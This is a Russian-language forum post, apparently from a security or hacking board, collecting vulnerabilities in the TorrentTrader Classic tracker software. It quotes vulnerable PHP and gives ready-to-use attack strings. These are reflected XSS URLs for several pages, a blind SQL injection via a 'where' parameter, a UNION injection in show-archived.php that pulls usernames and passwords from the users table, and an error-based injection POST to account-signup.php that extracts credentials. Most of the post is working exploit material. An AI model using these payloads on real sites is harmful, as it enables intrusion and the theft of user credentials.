Офф сайт = http://www.torrenttrader.org/ версия TorrentTrader Classic v1.09 XSS получается из за не достаточной обработки данных Code: print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>"); viewrequests.php?category=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E viewrequests.php?category=&filter=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E&sort=votes версия TorrentTrader Classic v2.04 XSS torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E p.S по структуре файлов похож на TBDev
Открываем файл torrents-details.php : Code: //speed mod $resSpeed = mysql_query("SELECT seeders,leechers FROM torrents WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15") or sqlerr(__FILE__, __LINE__); Code: http://localhost/torrents-details.php?id=1& where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+ Нормально выводит страницу Code: http://localhost/torrents-details.php?id=1& where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+ Пассивки везде: Code: http://localhost/themes/default/footer.php?ttversion=<script>alert(123);</script> http://localhost/themes/default/header.php?SITENAME="><script>alert(123);</script> http://localhost/themes/default/header.php?CURUSER[username]=<script>alert(123);</script> http://localhost/visitorstoday.php?todayactive=<script>alert(123);</script>
TorrentTrader Classic 1.09 Version : 1.09 SQL Injection Vuln file: show-archived.php [str:23] PHP: $query = 'SELECT title, user, date, text FROM news WHERE id=\'' . $_GET['id'] . '\''; $resu = mysql_query($query) or die(mysql_error()); Exploit: if magic_quotes = OFF Code: http://[host]/[path]/show-archived.php?id=1[COLOR=White]'+union+select+null,null,null,concat_ws(0x3a,username,password)+from+users+--+[/COLOR] Blind SQL Injection Vuln file: account-signup.php [str:73] PHP: $a = (@mysql_fetch_row(@mysql_query("select count(*) from users where username='$wantusername'"))) or die(mysql_error()); Если версия MySQL=>5.0.12 и magic_quotes = OFF, можно получить данные из ошибки Duplicate column name Exploit: Code: POST http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/account-signup.php HTTP/1.0 Content-type: application/x-www-form-urlencoded wantusername=xek[COLOR=White]' and (select * from (select * from (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1)a)b join (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1))c)d)/*[/COLOR] -------------------------------------------------------------- Другие уязвимости этого трэкера http://www.milw0rm.com/exploits/8958
